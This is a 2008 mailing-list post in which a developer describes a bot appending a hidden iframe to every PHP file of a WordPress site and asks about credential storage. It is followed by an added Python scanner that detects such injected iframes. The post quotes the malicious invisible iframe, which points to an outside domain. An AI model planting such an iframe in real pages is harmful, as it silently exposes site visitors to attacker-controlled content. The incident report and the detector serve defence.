[FX.php List] [OFF] Security
Jonathan Schwartz
jschwartz at exit445.com
Wed Apr 23 16:57:14 MDT 2008
Hi Folks,
Different Day, Different Challenge.
I had to deal with a client's issue today on a third party shared
server. It appears that a bot (?) got in and appended a line of code
to each php file in a WordPress directory:
<!--LiveInternet counter--><iframe
src="http://liveinternets.com/all/update.php" width=1 height=1
style="visibility:hidden;position:absolute"></iframe><!--/LiveInternet-->
Not sure what it is supposed to do, but it managed to generate PHP
buffer errors and stop the site in its tracks. Thankfully, a
multi-file global find/replace was able to do away with the offending
code.
None of my code was affected.
Now that I've experienced my first attack, I'm focused on security.
I'm interested to know if folks store usernames and passwords in the
FX/server-data.php file. Or, relocate these "keys to the kingdom"
remotely? I have seen advice to keep the info out of the web server
folder altogether.
Any war stories?
J
--
Jonathan Schwartz
Exit 445 Group
jonathan at exit445.com
http://www.exit445.com
415-381-1852
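
Added example, not part of the original message: a small Python scanner that walks a web directory and flags .php files whose tail contains a hidden iframe like the one quoted above. The heuristic, the 1024-byte tail window, the function names and the sample tree (with a placeholder URL) are assumptions of this example.

```python
import re
import tempfile
from pathlib import Path

# Heuristic (an assumption of this example): an <iframe> tag made invisible by
# 0/1-pixel dimensions or CSS, found in the last TAIL_BYTES of a file.
IFRAME = re.compile(rb"<iframe\b[^>]*>", re.I)
HIDDEN = re.compile(
    rb"visibility\s*:\s*hidden|display\s*:\s*none|(?:width|height)\s*=\s*[\"']?[01]\b",
    re.I)
TAIL_BYTES = 1024


def find_appended_iframe(data: bytes):
    """Return (offset, tag) for a hidden iframe in the file's tail, else None."""
    for m in IFRAME.finditer(data, max(0, len(data) - TAIL_BYTES)):
        if HIDDEN.search(m.group(0)):
            return m.start(), m.group(0)
    return None


def scan_tree(root):
    """Return {relative path: byte offset} for each flagged .php file under root."""
    hits = {}
    for path in sorted(Path(root).rglob("*.php")):
        found = find_appended_iframe(path.read_bytes())
        if found:
            hits[path.relative_to(root).as_posix()] = found[0]
    return hits


def demo():
    """Scan a constructed sample tree (placeholder URL, not the one in the post)."""
    clean = b"<?php echo 'hello'; ?>\n"
    injected = clean + (
        b'<!--counter--><iframe src="http://counter.example.invalid/u.php" width=1 '
        b'height=1 style="visibility:hidden;position:absolute"></iframe>\n')
    visible = clean + b'<iframe src="/map.php" width=600 height=400></iframe>\n'
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "wp-admin").mkdir()
        (root / "index.php").write_bytes(injected)
        (root / "wp-admin" / "admin.php").write_bytes(injected)
        (root / "wp-config.php").write_bytes(clean)
        (root / "map.php").write_bytes(visible)
        return scan_tree(root)


if __name__ == "__main__":
    print(demo())
```

The reported byte offset marks where the appended markup starts, so each flagged file can be reviewed or restored from a known-good copy before anything is stripped automatically.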